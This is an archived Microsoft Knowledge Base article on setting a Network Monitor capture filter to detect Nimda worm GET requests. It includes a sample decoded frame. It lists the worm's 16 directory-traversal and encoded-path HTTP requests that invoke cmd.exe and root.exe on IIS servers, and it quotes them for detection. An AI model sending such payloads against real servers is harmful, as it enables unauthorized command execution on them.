Microsoft KB Archive/317605

= How to Set a Filter to Capture Only Nimda Frames in Network Monitor =

Article ID: 317605

Article Last Modified on 3/2/2007

-

APPLIES TO


 * Microsoft Windows 2000 Server
 * Microsoft Windows 2000 Advanced Server
 * Microsoft Windows 2000 Professional Edition

-



This article was previously published under Q317605



SUMMARY
This article describes how to set a capture filter to capture only the first Nimda GET request frame in Network Monitor.



MORE INFORMATION
In some Microsoft-based networks, a remnant of Nimda computers may still be operating. The CERT Advisory CA-2001-26 Nimda Worm document states that the Nimda worm sends the following 16 HTTP GET requests:     GET /scripts/root.exe?/c+dir GET /MSADC/root.exe?/c+dir GET /c/winnt/system32/cmd.exe?/c+dir GET /d/winnt/system32/cmd.exe?/c+dir GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1x1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir This article describes how to set up a capture filter with the criteria of the first GET request:

GET /scripts/root.exe?/c+dir

To set up a capture filter with the criteria of the first GET request:
 * 1) On the Capture menu, click Filter, and then double-click Pattern Matches.
 * 2) In the Pattern box, click the ASCII option, and then type root.exe . Note that root.exe is case-sensitive, and is 726F6F742E657865 after it is converted to hexadecimal.
 * 3) In the Offset box, type 43, and then click From Start of Frame.
 * 4) Click OK, and then click OK.
 * 5) Start the capture.

For more information about how to use Network Monitor, see the Network Monitor Help file in the &quot;Systems Management Server Administrator's Guide.&quot;

Example of the Complete Frame
1 1044.932539 00D0062C24A0 LOCAL HTTP GET Request (from client using port 1636) NimdaHost WebServer IP Frame: Base frame properties Frame: Time of capture = 2/1/2002 13:8:0.266 Frame: Time delta from previous physical frame: 0 microseconds Frame: Frame number: 1 Frame: Total frame length: 126 bytes Frame: Capture frame length: 126 bytes Frame: Frame data: Number of data bytes remaining = 126 (0x007E) ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol ETHERNET: Destination address : 00C04F27CE94 ETHERNET: .......0 = Individual address ETHERNET: ......0. = Universally administered address ETHERNET: Source address : 00D0062C24A0 ETHERNET: .......0 = No routing information present ETHERNET: ......0. = Universally administered address ETHERNET: Frame Length : 126 (0x007E) ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol) ETHERNET: Ethernet Data: Number of data bytes remaining = 112 (0x0070) IP: ID = 0xFF7E; Proto = TCP; Len: 112 IP: Version = 4 (0x4) IP: Header Length = 20 (0x14) IP: Precedence = Routine IP: Type of Service = Normal Service IP: Total Length = 112 (0x70) IP: Identification = 65406 (0xFF7E) IP: Flags Summary = 2 (0x2) IP: .......0 = Last fragment in datagram IP: ......1. = Cannot fragment datagram IP: Fragment Offset = 0 (0x0) bytes IP: Time to Live = 125 (0x7D) IP: Protocol = TCP - Transmission Control IP: Checksum = 0xB33E IP: Source Address = 10.57.133.198 IP: Destination Address = 10.57.138.145 IP: Data: Number of data bytes remaining = 92 (0x005C) TCP: .AP..., len:  72, seq:1447167973-1447168045, ack:  48848871, win:17520, src: 1636  dst:   80 TCP: Source Port = 0x0664 TCP: Destination Port = Hypertext Transfer Protocol TCP: Sequence Number = 1447167973 (0x564207E5) TCP: Acknowledgement Number = 48848871 (0x2E95FE7) TCP: Data Offset = 20 (0x14) TCP: Reserved = 0 (0x0000) TCP: Flags = 0x18 : .AP...       TCP: ..0..... = No urgent data TCP: ...1.... = Acknowledgement field significant TCP: ....1... = Push function TCP: .....0.. = No Reset TCP: ......0. = No Synchronize TCP: .......0 = No Fin TCP: Window = 17520 (0x4470) TCP: Checksum = 0x7BCA TCP: Urgent Pointer = 0 (0x0) TCP: Data: Number of data bytes remaining = 72 (0x0048) HTTP: GET Request (from client using port 1636) HTTP: Request Method = GET HTTP: Uniform Resource Identifier = /scripts/root.exe?/c+dir HTTP: Protocol Version = HTTP/1.0 HTTP: Host = www HTTP: Undocumented Header = Connection: close HTTP: Undocumented Header Fieldname = Connection HTTP: Undocumented Header Value = close

Additional query words: netmon bloodhound bh

Keywords: kbenv kbhowto kbnetwork KB317605

-

[mailto:TECHNET@MICROSOFT.COM Send feedback to Microsoft]

© Microsoft Corporation. All rights reserved.